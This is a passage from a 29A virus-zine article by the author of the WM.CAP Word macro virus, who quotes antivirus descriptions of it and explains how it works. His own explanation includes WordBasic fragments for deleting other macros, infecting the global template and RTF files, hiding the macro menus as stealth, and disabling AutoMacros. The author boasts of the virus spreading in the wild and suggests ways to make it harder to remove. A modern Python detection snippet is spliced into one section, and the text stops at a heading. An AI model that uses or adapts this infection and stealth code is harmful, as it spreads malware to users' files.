29A Issue 02 02 04
WM.CAP virus description
───────────────────────────────────────────────────────────────────────────>
Jacky Qwerty/29A
This article gives a full description of the WordMacro CAP virus. It can be
seen as a "real" example for the different techniqz described in the past
article named "Macro virus trickz".
Check out as well the virus source code, also published in this isue.
Index
─────
1. Introduction
1.1 Macro virus hype
2. WM.CAP: a complex word macro virus?
3. In the Newz
3.1. Dr.Solomon speaks
3.2. Sophos speaks
3.3. McAfee speaks
3.4. F-Potatoe speaks
3.5. Norton speaks
3.6. AVP speaks
3.7. Quarterdeck speaks
4. Functional Description
4.1. Removal of macroz
4.1.1. Concept vs. Wazzu
4.1.2. CAP vs. Concept
4.2. Global template infection
4.2.1. Searchin for localized macroz
4.2.2. Incremental generation count
4.2.3. Removal of menu itemz - stealth
4.3. Document, template and RTF infection
4.4. Disablin of AutoMacroz
4.5. The "SaveAs" problem solved
5. Shortcutz
6. Disclaimer
1. Introduction
───────────────
Factz prove for themselvez. Macro virii have become one of the most comon
type of computer virus. While the latter sounds like a press release, we
cant deny that unfortunately it is becomin true. "Unfortunately" becoz as u
will see later, macro virii unlike other type of computer virii, are not
really very dificult to write, in fact much of them have been coded in a
very simple way, followin a straightforward programin aproach. While there
could be some few exceptionz to the rule, macro virii in general dont prove
to deserve that kind of atention that other more interestin type of compu-
ter virii mite do, regardin other innovative infection techniqz, new wayz
of residency, improved methodz for trapin file activity and the complexity
of the virus code itself. Featurez which are very dependent to a great ex-
tent on the skillz of the VXer himself.
1.1. Macro virus hype
─────────────────────
But leavin aside that atonishin publicity surroundin macro virii and now
followin a much more objetive aproach: what lies behind the creation of a
macro virus? is it really hard to write such virusez? why so much hype bout
Concept? well, not really. Much of that fuzz was nonsense, another press
release biten and exagerated by the obfuscating media. I remember at the
time Concept was big newz, AVerz started to say repeatedly again and again
that such macro virii were fairly easy to write and that they could be more
infectious and comon than any other virus type. Yea AVerz, strangely tho,
said the mean and lean truth. So now they come, shoot our mindz and then
wash their handz pretendin they have nothin to do with the macro virus
hype. After all, we are the "kidz" so we are the guilty onez, we are the
bad guyz and they are of course the heroez of the movie. Same old story.
2. WM.CAP: a complex macro virus?
─────────────────────────────────
CAP was a macro virus i wrote durin a bored December weekend after endin
classes for the quarter and startin my xmas vacationz. It was also my first
and last macro virus until i lost all of my interest in this stuff and fo-
cused my atention on other much more interestin virus related topicz :) It
began as a curiosity of mine when tryin to understand for myself how these
virusez worked and how much they could spread for themselvez.
The CAP virus made its way into the wild the same way most other virusez
do. It was writen in a simple 386 machine runin Windoze 3.1, it was tested
in both english and spanish versionz of Word 6, and was finaly released and
spread as with any other macro virus. Yea, it has some pretty kewl featurez
but they are far from bein extraordinary or complex as some AVerz put it,
especialy an AVer named Mikko Hyppönen from Datafellowz (F-Potatoe), a very
nice dude, author of F-Potatoe buletinz, who btw behaved very kind in his
last isue when he encouraged people to send their "opinion on virus writin"
to my Hotmail mailbox. I wont forget that one, Miko, very nice from u, pal.
However it was also the first time i thanked the phuckin mother who hacked
my Hotmail acount, hrmph @&%#..
3. In the newz
──────────────
Shortly after CAP was released, there apeared a seriez of increasin reportz
posted on several newsgroupz, especially from alt.comp.virus. Userz were
suspectin about a new macro virus removin the Toolz/Macro and Toolz/Custo-
mize menu itemz from their Word enviroment. A couple of monthz later, CAP
was bein reported at diferent regionz worldwide. Was CAP just another lucky
virus or there was somethin more behind? Well, just keep readin if u want
to know the mean and lean truth. #8)
But before this lets listen to what AVerz have to say about CAP, that mite
help us understand some more about CAP's functionin, mmm.. well, just a bit
coz u know how some AVerz are, regardin their virus descriptionz. They feed
on hype describin how good their AV programz detect virusez, instead of
describin how the virusez really work and how some of them are able to de-
feat and nulify their stuff. Most of the AV programz agree they can safely
remove all (removable) virusez they detect. Factz prove this is not true.
None of the macro AV programz, except perhaps new versions of F-MacroW,
have been able to remove properly all of the CAP spontaneously generated
variantz. And as u'll see later in this article, this behavior could have
been made much more complex on purpose.
3.1. Dr.Solomon speaks
──────────────────────
(*) Dr.Solomon - http://www.drsolomon.com/vircen/valerts/wmcap.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
WM/CAP
This macro virus appeared first in February 1997 and has quickly
become widespread. The basic virus consists of one large macro
called CAP (hence the name) which is called from the virus' other
macros - AutoExec, AutoOpen, FileSave, FileSaveAs, FileTemplates,
ToolsMacro, FileClose, FileOpen and AutoClose.
When the virus replicates, the first thing it does is to copy the basic
set of 10 macros. The virus then browses the WinWord menu items, collects
their names, (they could be different in different language versions,
or customized versions of WinWord), and intercepts up to 5 of these
additional macros - placing a pointer to the main CAP macro inside them.
If there are any system macros defined in a global template before the
infection - they are deleted. The virus also removes the menu items
Tools/Macro and Tools/Customize. The File/Templates menu item is present
after infection but it does not work.
In essence, then, the virus consists of 10 basic English macros and up
to 5 additional macros taken from the menus if they are not standard
for the English language version of WinWord.
The virus uses information from the macro description field, (at the
bottom of Tools/Macro box), for self recognition of its core macros.
These have "F%" at the beginning of a description (FileOpen has F%O,
FileClose - F%C, FileSave - F%S and FileSaveAs - F%SA).
The virus has no damaging payload except that it removes system macros
defined in the global template.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.2. Sophos speaks
──────────────────
(*) Sophos - http://www.sophos.com/virusinfo/analyses/winwordcap.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Virus analyses Winword/CAP
───────────────────────────────────────────────────────────────────
Virus Name: Winword/CAP.
Aliases: None known.
Type: MS Word document infector.
Resident: Yes, within Word environment.
Stealth: Yes. Empty macros are used to prevent Word showing menu
items. For example, the ToolsMacro (or ExtrasMakro under
German Word) is empty, which prevents the use of the
ToolsMacro to see whether or not there are macros
present. The virus also removes the menu item itself so
that it does not even appear in the list of available
choices.
Trigger: None.
Payload: None.
Comments:
The Winword/CAP virus installs the following macros:
FileTemplates, ToolsMacro, FileSaveAs, FileClose,
AutoClose, FileSave, FileOpen, AutoOpen, AutoExec and
CAP. In addition, the virus will find the current local
language version of the macros and will install these as
well as the English ones. For example, if the virus
infects a German version of Word, it will also install
macros named DateiOffnen, DateiSpeichern,
DateiSpeichernUnter, DateiSchliebenOderAllesSchlieben.
With the exception of the CAP macro itself, all the
macros are very short stubs which either call
subroutines within CAP or do nothing at all.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.3. McAfee speaks
──────────────────
(*) McAfee - http://www.mcafee.com/support/techdocs/vinfo/vm007.asp
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
CAP.A
Virus Characteristics
This virus propagates by infecting Word Documents in Microsoft WORD
Versions 6.x / 7.x on Windows and Macintosh platforms.
The virus consists of these macros:
CAP, AUTOEXEC, AUTOOPEN, AUTOCLOSE, FILETEMPLATES, FILESAVE,
FILESAVEAS, TOOLSMACRO, FILEOPEN, FILECLOSE
in an infected document. In localized language versions of MS Word
some macros are copied to the specific SystemMacro name.
The virus becomes active by using Auto- and SystemMacros. All macros
are encrypted using the standard Word execute-only feature. Meaning
that the user is unable to edit or view the macro code.
Indications of Infection
Before infection it will delete all existing macros in NORMAL.DOT or
other templates.
On an infected system the virus hides the FILE|TEMPLATE and
TOOLS|MACRO functionality. Warning: It is important not to
use this command, as you will execute the viral code. It
may also delete these menu entries plus TOOLS|CUSTOMIZE in
the global environment. If you are affected by this virus
please read 'Add. Information'.
Virus Information
Discovery Date: Mar 1997
Origin: Venezuela
Length: Not Applicable
Type: General Macro Virus Information
Prevalence: Common
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) McAfee - WHATSNEW.TXT file from McAfee's SCAN v3.0.2
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
CAP.A
The Word Macro virus, CAP.A, is spreading wildly on all
corners of the globe, especially in the United States.
McAfee's AVERT Team has documented cases of CAP.A found
in: Brazil, Germany, Australia, Hong Kong, Argentina,
Colombia, England, Sweden, Mexico, Venezuela, and Russia.
CAP.A's behavior depends upon the language of Microsoft
Word being used, or if the installation of Microsoft Word
has been customized, making the cleaning of the virus
challenging for many antivirus products.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.4. F-Potatoe speaks
─────────────────────
(*) F-Potatoe (DataFellows) - http://www.datafellows.fi/v-descs/cap.htm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Computer Virus Information Pages
NAME: CAP
ALIAS: WordMacro/CAP, CUP
ORIGIN: Venezuela
For more information on macro viruses, see WordMacro/Concept.
CAP is a complex Word macro virus. It consists of several
encrypted macros: CAP, AutoExec, AutoOpen, FileSave, FileSaveAs,
FileTemplates, ToolsMacro, FileClose, FileOpen and AutoClose.
The virus contains these texts in comments:
'C.A.P: Un virus social.. y ahora digital..
'"j4cKy Qw3rTy" (jqw3rty@hotmail.com).
'Venezuela, Maracay, Dic 1996.
'P.D. Que haces gochito ? Nunca seras Simon Bolivar.. Bolsa !
When infecting Word, CAP modifies up to five already-existing
menus, redirecting them to the virus code. This creates some
problems, as the names of the modified entries are different in
different Word installations and different language versions of
Word.
When CAP infects documents, it deletes all existing macros from
them. Otherwise CAP does not do anything destructive. However,
it does remove the Tools/Macro and Tools/Customize menus and
disables File/Templates menu in order to protect itself.
WordMacro/CAP.A was reported in the wild in several countries in
1997. It's probably related to the WordMacro/Rapi virus.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.5. Norton speaks
──────────────────
(*) Norton AV - http://www.symantec.com/avcenter/data/wm.cap.a.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
WM.CAP.A
Aliases: WordMacro/CAP.A
Infection Length: 10 macros
Area of Infection: Microsoft Word documents
Likelihood: Common
Region Reported: Worldwide
Characteristics: Wild, macro, Stealth
Target Platform: Macro
Trigger Date: None
Description:
WM.CAP.A is a virus that consists of 10 macros.
Macro Name     Description
CAP            Infection Routine
AUTOEXEC       Calls the CAP macro
AUTOOPEN       Calls the CAP macro
FILEOPEN       Calls the CAP macro
FILESAVEAS     Calls the CAP macro
AUTOCLOSE      Calls the CAP macro
FILECLOSE      Calls the CAP macro
FILESSAVEAS    Calls the CAP macro
TOOLSMACRO     Used for the Stealth Routine
FILETEMPLATES  Used for the Stealth Routine
All the macros are stored in encrypted form in the infected documents.
Also WM.CAP.A has a stealth feature which hides the [macro...] menu
item from the [Tools] menu and the [Templates...] menu item from the
[File] menu when the NORMAL.DOT (Global template) file is infected.
This will prevent the user from checking the list of macros which is
contained in the document or template and hides the macros. Once the
NORMAL.DOT file is disinfected, the [macro...] menu and [Templates...]
menu item are restored.
WM.CAP.A has no intentional Trigger or Payload.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.6. AVP speaks
───────────────
(*) AVP - http://www.avp.ch/avpve/macro/word/cap.stm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
This is an encrypted stealth macro virus. It contains ten macros:
CAP - infection routine
AutoExec - calls the infection routine
AutoOpen - - // -
FileOpen - - // -
FileSave - - // -
AutoClose - - // -
FileClose - - // -
FileSaveAs - - // -
ToolsMacro - hides all macros ("stealth" routine)
FileTemplates - - // -
The virus not only disables ToolsMacro and FileTemplates menus, but also
deletes the references to them in main menus File and Tools. The virus
also disables auto-macros. As a result it is not possible to disinfect
this virus by using Word functions - it is not possible to delete
virus macros, create new ones or run existing virus-removing macros.
The virus emulates "FileSaveAs" while saving infected documents -
it writes an empty document to disk.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.7. Quarterdeck speaks
───────────────────────
(*) Quarterdeck - http://www.quarterdeck.com/quarc/00011/00011128.htm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
WM/Cap.A
Summary: WM/Cap.A infects Microsoft Word for Windows documents and
templates. It contains 10 macros: CAP, AutoExec, AutoOpen,
FileOpen, FileSave, AutoClose, FileClose, FileSaveAs,
ToolsMacro, FileTemplates -- about 214 lines and 3926
characters of macro code after analysis standardizes the
formatting within the virus.
Author: Unknown
Date of Origin: Prior to January 1996
Prevalence: Prevalent in Belgium, Canada, Czech Republic, Denmark,
Finland, Hong Kong, Luxemburg, New Zealand, Norway, Peru,
South Africa, Sweden, U.K., U.S.A. and elsewhere as of
July, 1997.
Variants: At least 18 variants as of June 30, 1997: A, B, C, D, E,
F, J, L, N, O, P, Q, R, S, T, U, V, W
Macro Functions:
CAP: This macro contains an infection routine which appears to
work in all language versions. Includes code to trap any
errors and ignore them, to help avoid detection. Modifies
user settings for saving documents. Options are set to
fast saves, allow automatic saving, save changes in global
template without asking, 10 minutes between automatic
saves. Removes menu options from Word's menus. The global
template (usually Normal.dot) will need to be deleted in
order to restore Word's normal menus. Disables AutoOpen,
AutoClose, AutoNew, and AutoExit macros, disabling many
other macro viruses, as well as any macro-based anti-virus
protection.
AutoExec: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
AutoOpen: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
FileOpen: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
FileSave: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
AutoClose: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
FileClose: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
FileSaveAs: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
ToolsMacro: Hides the [Macro...] menu option normally on the [Tools]
menu when an infected file is loaded, preventing a user
from using this menu option to see the macros of the
virus.
FileTemplates: Hides the [Templates...] menu option normally on the
[File] menu when an infected file is loaded, preventing a
user from using the [Organizer] option on this menu to see
the macros of the virus.
Stealth Mechanisms: Hides the [Macro...] menu option normally on the [Tools]
menu when an infected file is loaded, preventing a user from using this menu
option to see the macros of the virus. Hides the [Templates...] menu option
normally on the [File] menu when an infected file is loaded, preventing a
user from using the [Organizer] option on this menu to see the macros of the
virus. High stealth.
Comments: This sample of WM/Cap.A contains the following comments:
(...)
These comments are ignored by Word when the macros in
WM/Cap.A run, and are not displayed. Comments in macro
viruses sometimes suggest date or place of origin,
authorship or purpose of the virus.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
4. Functional description
─────────────────────────
While the description from Dr.Soly is the most accurate from the above, it
still doesnt explain some especific detailz. Some descriptionz are, well..
full hype, some are just promotin how excelent their AV program is and some
just dunno what they say. However no matter how good or bad any description
is, they have somethin in comon: all of them invariably try to hide the
true reason why CAP has become so comon. I'll try to remedy that here by
writin my own description now.
4.1. Removal of macroz
──────────────────────
Whenever an infected document is opened, or a clean or infected Word
enviroment is started, the virus first checks its own set of 10 basic macroz
from the infected document bein opened. All CAP macroz share a common pattern
("F%") stored in the macro description field. If this pattern is not found,
CAP deletes the macro. This process is then repeated for the global template
(NORMAL.DOT). This means that all of the foreign macroz stored in the infected
document and in the global template prior to infection are removed. This
includes any protection AV tool or any other macro virus.
4.1.1. Concept vs Wazzu
───────────────────────
This prior scenario has a strong implication regardin CAP survival. Supose
a given company is bein strongly infected by the Concept or any other macro
virus. Now supose another macro virus, say Wazzu, enters in the company
circulation. Now these two virusez will be fightin each other for survival.
There cant be two "AutoOpen" macroz for obvious reasonz as there cant be o-
ther macroz repeated twice. The final result could be a new "Concept-Wazzu"
variant consistin of snatched macroz from each virus, or simply the same
diferent two virusez collidin with each other all the time. But what if the
second virus enterin the company is the CAP virus?
4.1.2. Concept vs CAP
─────────────────────
Well, thingz will be a bit diferent this time. The CAP virus will spread
for itself to other documentz as with any other macro virus, but it wont
spend its time collidin with Concept, instead CAP will just remove each
instance of Concept from the infected documentz and replace it with its own
copy. If CAP keeps spreadin this way from documentz, it doesnt take much
time to figure out the final resultz. In a matter of dayz, CAP will clearly
"outnumber" Concept, until it almost disapears from the company. This means
that CAP can be considered an eficient antivirus for macro virus, coz the
macro cleanin capabilitiez travel and spread inside the virus itself. The
slogan here is: "Use CAP as your favourite AV program". At this point i can
hear Bontchy mentionin my genealogic tree from top to bottom ($@%#..) X-DD.
When CAP finishes the macro checkin, it has a count for the number of ge-
nuine CAP macroz from the global template and another same count from the
infected document. If the number of CAP macroz in the global template is
less than or equal to 10 (the number of english basic macroz) then the
infection (or re-infection) of the global template takes place.
4.2. Global template infection
──────────────────────────────
The infection of the Global template allows the macro virus to be loaded
resident inside the Word aplication every time the latter starts. Before
infectin the Global template, CAP uses the comon trick of turnin off the
Global template prompt warnin when it is about to be saved on disk. Besides
this, CAP also turns on FastSavin and AutoSavin, setin the AutoSave interval
to 10 minutez. Then the copy of macroz takes place. In the particular case of
CAP, the virus infects the Global template by first copyin just the basic set
of 10 english macroz from the infected document. If CAP had copied all of the
macroz contained in the infected document besides the english onez, the
resultz would have been a real nightmare for AV developerz. There would have
been a mix of diferent localized language macro namez inside CAP. The very
first unedited and unreleased versionz of CAP worked this way but i decided
to strip this feature off for technical reasonz that i will explain later.
Continuin with the above hypothetical example, supose that a document was
infected by CAP in an english version of Word. Now supose this document so-
mehow travels and infects an italian version of Word. Now the virus would
contain 15 macroz (10 english onez plus 5 italian onez). If the document
now infects a german version of Word, there would be 20 macroz (10 english
onez, 5 italian onez and 5 german onez). If the virus keeps spreadin this
way thru other diferent localized versionz of Word, the number of macroz
could easily reach 50 for a given document havin traveled all over the
world and havin infected at least more than 8 diferent localized versionz
of Word. Fortunately the only CAP version bein released doesnt work that
way. Otherwise it would have been a big kick in the AVerz's assez. #8P
4.2.1. Searchin localized macroz
────────────────────────────────
While the latter aproach would have made sense in order to annoy AVerz,
technically it would have been useless and worthless in the particular case
of the Global template infection. Coz after the virus has copied the basic
set of 10 english macroz, the followin step is to search the menu itemz for
the current localized file related macroz and copy them to the Global tem-
plate. After this step, suport for especific localized versionz of Word has
been added without the need to copy all of the other localized macroz from
the infected document. This conjunction of stepz proves to be more efective
than the one discused in the hypothetical example described above. This way
the maximum number of macroz in any infected or Global template will never
exceed 15.
In the past article "Macro virus trickz", point 3.1. (The "MultiLanguage
suport" solution) and point 3.2 (The "MultiLanguage suport" example), the
search and copy of localized file related macroz from the menu itemz is
explained in full detail. This is the same aproach implemented in the CAP
virus as the next chunk of code shows:
A$ = MenuText$(0, 1)
For I = CountMacros(1) To 1 Step - 1
    J = 0
    B$ = MacroName$(I, 1)
    Select Case MacroDesc$(B$)
        Case S$ + "O"
            J = 2
        Case S$ + "C"
            J = 3
        Case S$ + "S"
            J = 5
        Case S$ + "SA"
            J = 6
    End Select
    If J Then
        C$ = MenuItemMacro$(A$, 0, J)
        If Left$(UCase$(C$), Len(M$(J))) <> UCase$(M$(J)) And
           Left$(C$, 1) <> "(" Then MacroCopy F$ + ":" + B$, C$, K
    End If
Next
4.2.2. Incremental generation count
───────────────────────────────────
One feature that has not been mentioned before is the fact that CAP con-
tains a "generation count". This count, unlike other previous macro virusez
implementin generation countz, is stored in one of the viral macroz inside
all CAP infected documentz, especificaly in the macro description field of
the "ToolsMacro" macro. This generation count can be seen in two diferent
wayz. Usin a hex editor to dump the contentz of an infected file and lookin
for somethin like "F%n" where "n" is the generation count. Or enablin the
"Tools/Macro" menu item from the "Tools" menu. If this menu item gets the
focus, the macro description will be shown in the bottom left corner of
the aplication window, revealin somethin like "F%5" where "5" in this case,
is the generation count.
It has been said that all of the CAP macroz are encrypted usin the "Execute
Only" feature provided by Word. While this is certainly true for most of
the CAP macroz, it is not true for the "ToolsMacro" macro. In other wordz,
the "ToolsMacro" macro, which is empty, is never encrypted. U mite say this
is clumsy, but it is not. The reason for this, is becoz if any macro is en-
crypted, its macro description field cannot be modified. This wouldnt allow
us to increment the generation count stored in the "ToolsMacro" macro des-
cription field. But how do we increment this generation count? The followin
piece of code answers the question:
C$ = "F%" + LTrim$(Str$(Val(Mid$(MacroDesc$("ToolsMacro"), 3)) + 1))
ToolsMacro .Name = "ToolsMacro", .Show = 1, .Description = C$, .SetDesc
The first line simply gets the "ToolsMacro" description field usin the
"MacroDesc$" function, then discards the first two characterz ("F%") usin
the "Mid$" function, then converts the remainder string to an integer usin
the "Val" function, then increments the result by simply addin "1", then
converts it back to a string usin the "Str$" function and finally concate-
nates it with "F%" to obtain the final string containin the next incremen-
ted generation count embeded with it. The second line in the above piece of
code simply sets the new description for the "ToolsMacro" macro, containin
the new incremented generation count.
The generation count is incremented after the basic set of 10 english ma-
croz have been copied to the Global template, as a result such count is in-
cremented only once for each Word aplication infected with CAP. All newly
created documentz, saved, closed or opened, will contain the same genera-
tion count at the time the Global template was infected.
4.2.3. Removal of Tool itemz - stealth
──────────────────────────────────────
Perhapz one of the most known featurez of CAP is its ability to remove some
key menu itemz from the "Toolz" menu. This has been a clue for AVerz. When-
ever a Word user posted a mesage sayin his Toolz/Macro and Toolz/Customize
menu itemz disapeared, there also apeared some AVer sayin: "You have the
CAP virus". This feature has also proved to be very anoyin and frustratin
among AVerz, as it complicates to some extent the complete and correct dis-
infection of the Global "NORMAL.DOT" template, becoz userz of course, want
their menu itemz back.
In efect, some AV programz that are able to remove all of the CAP viral ma-
croz from the Global template, would find themselvez a bit frustrated at
their inability to properly fix the changez made by CAP to the Word menuz.
Its pathetic readin the comon solution provided by most of these high tech
AVerz in order to fix the problem. I still can hear them say: "Exit Word,
delete NORMAL.DOT, Start Word, now the menu itemz are back". While this
straightforward solution certainly works, it proves to be quite ineficient
and exagerated as well. C'mon the fastest and most efective solution was at
the "right click" of a mouse! Well, heh.. sometimez i think it is true some
AVerz have 4 bugz playin cardz in their brainz :) This solution even worked
on my Word 6.0 runin on Win3.1, not just Win95.
Just in case u need the solution, its very simple: Right-click over some
place at the toolbar, the Customize window box opens, select the "Menus"
tab, push the "Reset All" buton then click OK, thats all. After these stepz
the menu itemz "Toolz/Macro", "Toolz/Customize", etc, are back. However, no
matter whether the first or the second procedure is used, if the user made
menu customizationz or added butonz to his toolbar, they are lost after doin
any of these stepz. There exists however a third solution not mentioned be-
fore in which the user wont lose any of his customizationz except of course
his own macroz (now deleted) if they existed. It consists of addin the lost
menu itemz one by one usin the "Add" buton from inside the "Customize" win-
dow box. Good enough, now lets continue with our stuff.
The actual implementation of the macro code targeted to remove these menu
itemz is very simple, but it certainly looks somewhat complicated and messy
if u have a first look at the virus code itself:
For I = 0 To 1
    If I Then J = 1 Else J = 6
    A$ = MenuText$(I, J)
    J = CountMenuItems(A$, I) - 1
    For M = J To 1 Step - 1
        If InStr(MenuItemMacro$(A$, I, M), "Macro") Then
            If I Then
                B$ = MenuItemMacro$(A$, I, M - 2)
                If UCase$(B$) <> UCase$(M$(9)) And
                   Left$(B$, 1) <> "(" Then MacroCopy "ToolsMacro", B$, K
            Else
                M = M + 1
            End If
            For T = M To M - 1 Step - 1
                If T > 3 Then ToolsCustomizeMenus .MenuType = I,
                                  .Position = T,
                                  .Name = MenuItemMacro$(A$, I, T),
                                  .Menu = A$, .Remove, .Context = 0
            Next
            M = 1
            T = 0
        End If
    Next
Next
This code starts by inspectin each of the menu itemz from the "Toolz"
menu from top to bottom, scanin each name for the word "Macro" inside them.
If any of the menu itemz contains such word as part of its name, then CAP
asumes it has found the position for the "Toolz/Macro" menu item inside the
"Toolz" menu. If this condition is met, CAP deletes the actual menu item
(Toolz/Customize). If the virus is searchin inside the "File" menu - with
no documentz opened - (second step) and if the word "Macro" is found inside
any of the menu itemz from such "File" menu, CAP removes the actual menu
item (Toolz/Macro) and the "previous" one - not the next one - which in the
case of the "File" menu (with no documentz opened), is really a "separator"
itself startin with "(".
If u are curious enough, u'll notice somethin in the above code not mentio-
ned in the latter explanation. There is a "MacroCopy" function. This func-
tion gets control when the "Filez" menu is bein scaned and the "Toolz/Ma-
cro" item is found as well. Its sole purpose is to copy the "FileTemplatez"
macro to the current localized macro name.
If for some reason, the above stepz dont work, i.e. the "Toolz/Macro" menu
item could not be found, for example in German versionz of Word where "Ma-
cro" is spelled as "Makro", then another chunk of code is executed:
A$ = MenuText$(1, 1)
[...]
J = CountMenuItems(A$, 1) - 1
[...]
For I = 6 To J
    If Left$(MenuItemMacro$(A$, 1, I), 1) = "(" And
       Left$(MenuItemMacro$(A$, 1, I - 2), 1) = "(" Then
        For T = 1 To 3 Step 2
            B$ = MenuItemMacro$(A$, 1, I - T)
            If Left$(B$, 1) <> "(" Then MacroCopy M$(T + 6), B$, K
        Next
        I = J
    End If
Next
This code actually tries to make some guessez about where the "Toolz/Macro"
and "File/Templatez" menu itemz are located in the "File" menu (when no filez
are opened). If these checkz are passed then the "ToolsMacro" and
"FileTemplates" macroz are copied to their respective localized macro namez.
Unfortunately after CAP was released i realized that the condition block for
the "If" statement was never met becoz of a certain detail i didnt realize.
This is the reason why in the German version of Word, or in general in any
other localized version where the word "macro" is not found in the menu
itemz, there won't be an equivalent localized macro for "FileTemplates" nor
"ToolsMacro". Well what TF nobody's perfect! #8I.
4.3. Document, template and RTF infection
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It has been said that CAP, as with any other macro virus, infects Word
documentz and templatez. However, what AVerz seem to have missed entirely is
the fact that CAP also infects documentz in RTF (Rich Text Format) layout. If
AVerz argue that RTF filez cant contain macroz at all, they are certainly
right. But hey, nothin stops us from convertin the RTF file into a Word
template and then copyin our macroz there! If so, the file will still have
the RTF extension but will contain a template format inside. Here's the code:
Dim D As FileSaveAs
GetCurValues D
If N < 10 And D.Format = 1 Or D.Format = 0 Or D.Format = 6 Then
D.Format = 1
For I = CountMacros(0) To 1 Step - 1
B$ = MacroName$(I, 0)
If B$ <> "ToolsMacro" Then K = - 1 Else K = 0
MacroCopy B$, F$ + ":" + B$, K
Next
FileSaveAs D
End If
The above code simply checks for 3 posible conditionz: if the file is a
clean template, if the file is a document or if it has a RTF layout. If any
of these conditionz is met, the object will become infected. The infection
consists of copyin all the CAP macroz (english macroz plus localized ones
if they exist) from inside the Global template to the object bein infected
(DOT, DOC or RTF). Note in the "For" loop that when the macro name matches
"ToolsMacro", it will be copied in unencrypted form (K=0) in order to keep
the generation count alive.
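A defender-side check for the RTF trick just described, added here as an example that is not part of the article or of the CAP source: Word's binary documentz and templatez are OLE2 compound files, so a file named .rtf whose first bytes are the OLE2 signature instead of "{\rtf" is a macro-capable template under a misleading extension. The signature constants are public, well-known values; the sample headers and function names are constructed for this example.

```python
# Added example (not from the article or the CAP source code).
# Defender-side check for the RTF trick described above: a file saved by CAP
# keeps its .rtf name but its content is a Word template, i.e. an OLE2
# compound document. Real RTF is plain text beginning with "{\rtf", while
# Word 6/7/97 .doc/.dot containers begin with the OLE2 signature bytes
# D0 CF 11 E0 A1 B1 1A E1. Comparing the leading bytes against the
# extension exposes the mismatch without trusting the name.
from pathlib import Path

RTF_MAGIC = b"{\\rtf"
OLE2_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")


def classify(header: bytes) -> str:
    """Classify a file by its leading bytes: 'rtf', 'ole2' or 'unknown'."""
    if header.startswith(RTF_MAGIC):
        return "rtf"
    if header.startswith(OLE2_MAGIC):
        return "ole2"
    return "unknown"


def rtf_disguises_template(name: str, header: bytes) -> bool:
    """True when the name claims RTF but the bytes are an OLE2 container,
    i.e. a macro-capable template/document wearing an .rtf extension."""
    return name.lower().endswith(".rtf") and classify(header) == "ole2"


def check_path(path: Path) -> bool:
    """Apply the check to a file on disk (only the first 16 bytes are read)."""
    with path.open("rb") as fh:
        return rtf_disguises_template(path.name, fh.read(16))


def scan_headers(files: dict) -> list:
    """Return the sorted names of suspicious entries in {name: header_bytes}."""
    return sorted(n for n, h in files.items() if rtf_disguises_template(n, h))


# Constructed sample headers; only the first bytes matter for the check.
SAMPLES = {
    "memo.rtf": b"{\\rtf1\\ansi\\deff0 Hello",   # genuine RTF text
    "report.rtf": OLE2_MAGIC + b"\x00" * 8,      # template hidden under .rtf
    "notes.doc": OLE2_MAGIC + b"\x00" * 8,       # normal binary .doc
    "plain.txt": b"Nothing to see here",         # unrelated file
}

if __name__ == "__main__":
    for name in scan_headers(SAMPLES):
        print(f"{name}: .rtf extension but OLE2 compound document inside")
```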
4.4. Disablin of AutoMacroz
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Probably u have heard about some macro virusez bein able to "enable"
AutoMacroz just in case they have been turned off. A clear example is the
WordMacro.Colors virus, which enables AutoMacroz each time the "Tools/Macro"
menu item is activated. While this could have some benefitz, it could also
add some drawbackz and dangerous efectz to our macro virus. If AutoMacroz
are enabled, then any AutoMacro that had been turned off in any template
will be reactivated. As a result, if the global template has an "AutoOpen"
macro, it will be executed each time a new document is opened. However, if
the document about to be opened contains another "AutoOpen" macro, perhaps
bein part of the same or "another" macro virus, then this latter macro will
be executed "before" the "AutoOpen" macro from inside the global template.
This means that another "foreign" macro virus could be executed "first"
without our knowledge!
If survival is critical for our macro virus, then its quite obvious that
enablin AutoMacroz should be avoided if posible. If another macro virus gets
control before ours, posibly by meanz of one of its AutoMacroz, then it
could wipe away all of our own macroz from the global template, thus
destroyin and removin our macro virus. This is unavoidable and very likely to
hapen if AutoMacroz are enabled, so u better think about it the next time u
enable AutoMacroz.
If our macro virus consists only of one single AutoOpen macro then disablin
AutoMacroz will obviosly stop all chancez to spread our virus further, so
thats perhaps a bad idea. However if our virus contains other macroz that
could automaticaly be executed or activated by other user actionz such as
keystrokez, file menu itemz, toolbar butonz, etc, then the "disablin" of
AutoMacroz would prove to be a much more atractive and robust aproach as it
will guarantee the survival of our macro virus.
4.5. The "SaveAs" problem solved
